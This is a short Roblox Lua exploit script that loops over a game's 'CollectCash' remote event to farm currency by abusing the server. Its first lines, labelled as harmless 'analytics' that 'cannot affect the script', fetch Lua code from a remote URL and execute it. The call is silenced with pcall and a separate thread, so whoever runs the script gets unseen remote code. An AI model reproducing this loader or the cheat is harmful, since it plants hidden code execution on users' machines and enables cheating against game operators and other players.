--[[rscripts:analytics:start]] -- Script analytics (enabled by the creator on rscripts.net). -- Runs in its own thread and cannot affect the script below. task.spawn(function() pcall(function() loadstring(game:HttpGet("https://rscripts.net/api/telemetry/client.lua?s=6a565e317b788d6a9cb33893"))() end) end) --[[rscripts:analytics:end]] local Event = game:GetService("ReplicatedStorage"):WaitForChild("CollectCash") local CashFolder = workspace:WaitForChild("Cash") while true do local cashChildren = CashFolder:GetChildren() for i = 1, 400 do local targetCash = cashChildren[i] if targetCash then Event:FireServer(targetCash) end task.wait(0.01) end task.wait(0.1) end